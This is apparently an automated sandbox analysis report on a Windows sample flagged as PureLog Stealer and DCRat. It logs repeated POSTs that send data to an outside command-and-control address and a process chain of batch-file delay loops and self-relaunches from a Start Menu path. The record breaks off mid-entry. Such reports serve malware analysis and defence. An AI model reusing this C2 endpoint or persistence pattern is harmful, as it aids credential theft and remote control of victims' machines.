3 | 192.168.2.5 | 49998 | 194.135.20.4 | 80 | 6500 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe

Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 17:48:24.710217953 CET | 487 | OUT | POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 194.135.20.4
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Nov 2, 2024 17:48:25.060025930 CET | 344 | OUT | POST body (application/octet-stream)
Nov 2, 2024 17:48:25.536206007 CET | 516 | IN | HTTP/1.1 100 Continue
HTTP/1.1 404 Not Found
Date: Sat, 02 Nov 2024 16:48:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 274
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 50000 | 194.135.20.4 | 80 | 1672 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe

Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 17:48:34.408323050 CET | 499 | OUT | POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 194.135.20.4
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Nov 2, 2024 17:48:34.762912989 CET | 344 | OUT | POST body (application/octet-stream)
Nov 2, 2024 17:48:35.251580000 CET | 516 | IN | HTTP/1.1 100 Continue
HTTP/1.1 404 Not Found
Date: Sat, 02 Nov 2024 16:48:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 274
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 50002 | 194.135.20.4 | 80 | 7084 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe

Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 17:48:47.882309914 CET | 552 | OUT | POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 194.135.20.4
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Nov 2, 2024 17:48:48.231930017 CET | 344 | OUT | POST body (application/octet-stream)
Nov 2, 2024 17:48:48.706559896 CET | 516 | IN | HTTP/1.1 100 Continue
HTTP/1.1 404 Not Found
Date: Sat, 02 Nov 2024 16:48:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 274
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 50004 | 194.135.20.4 | 80 | 6088 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe

Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 17:48:57.788095951 CET | 487 | OUT | POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 194.135.20.4
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Nov 2, 2024 17:48:58.138127089 CET | 344 | OUT | Data Raw: [binary request body, 344 bytes]
Nov 2, 2024 17:48:58.612087011 CET | 516 | IN | HTTP/1.1 100 Continue
                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:48:58 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 50005 | 194.135.20.4 | 80 | 5528 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 17:49:09.516796112 CET | 535 | OUT | POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
Nov 2, 2024 17:49:09.874196053 CET | 344 | OUT | Data Raw: [binary request body, 344 bytes]
Nov 2, 2024 17:49:10.363123894 CET | 516 | IN | HTTP/1.1 100 Continue
                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:49:10 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 50008 | 194.135.20.4 | 80 | 1852 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 17:49:23.024516106 CET | 535 | OUT | POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
Nov 2, 2024 17:49:23.372236967 CET | 344 | OUT | Data Raw: [binary request body, 344 bytes]
Nov 2, 2024 17:49:23.885118961 CET | 516 | IN | HTTP/1.1 100 Continue
                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:49:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
9 | 192.168.2.5 | 50009 | 194.135.20.4 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 17:49:31.858023882 CET | 552 | OUT | POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
Nov 2, 2024 17:49:32.216011047 CET | 344 | OUT | Data Raw: [binary request body, 344 bytes]
Nov 2, 2024 17:49:32.698788881 CET | 516 | IN | HTTP/1.1 100 Continue
                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:49:32 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
10 | 192.168.2.5 | 50011 | 194.135.20.4 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 17:49:44.775507927 CET | 535 | OUT | POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
Nov 2, 2024 17:49:45.122374058 CET | 344 | OUT | Data Raw: [binary request body, 344 bytes]
Nov 2, 2024 17:49:45.629149914 CET | 516 | IN | HTTP/1.1 100 Continue
                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:49:45 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


                                                        Target ID:0
                                                        Start time:12:47:21
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\Desktop\teh76E2k50.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Desktop\teh76E2k50.exe"
                                                        Imagebase:0x8f0000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2197360091.00000000008F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2310983468.00000000133EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:12:47:31
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:12:47:31
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:12:47:32
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:12:47:32
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\PING.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:ping -n 10 localhost
                                                        Imagebase:0x7ff717a10000
                                                        File size:22'528 bytes
                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:12:47:42
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0x610000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 71%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:12:47:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uHdcbfRrII.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:12:47:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:12:47:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:12:47:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\PING.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:ping -n 10 localhost
                                                        Imagebase:0x7ff717a10000
                                                        File size:22'528 bytes
                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:12:47:56
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0x360000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:12:48:03
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:12:48:04
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:12:48:04
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:19
                                                        Start time:12:48:04
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\w32tm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        Imagebase:0x7ff791ec0000
                                                        File size:108'032 bytes
                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:20
                                                        Start time:12:48:10
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0xb10000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:22
                                                        Start time:12:48:14
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\znx0BCuWHE.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:23
                                                        Start time:12:48:14
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:24
                                                        Start time:12:48:14
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:25
                                                        Start time:12:48:15
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\w32tm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        Imagebase:0x7ff791ec0000
                                                        File size:108'032 bytes
                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:26
                                                        Start time:12:48:20
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0x6f0000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:28
                                                        Start time:12:48:24
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8JExSyzmRo.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:29
                                                        Start time:12:48:24
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:30
                                                        Start time:12:48:24
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:31
                                                        Start time:12:48:24
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\w32tm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        Imagebase:0x7ff791ec0000
                                                        File size:108'032 bytes
                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:32
                                                        Start time:12:48:29
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0x100000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:34
                                                        Start time:12:48:34
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ibWrXDwbZz.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:35
                                                        Start time:12:48:34
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:36
                                                        Start time:12:48:34
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:37
                                                        Start time:12:48:34
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\PING.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:ping -n 10 localhost
                                                        Imagebase:0x7ff757150000
                                                        File size:22'528 bytes
                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:38
                                                        Start time:12:48:43
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
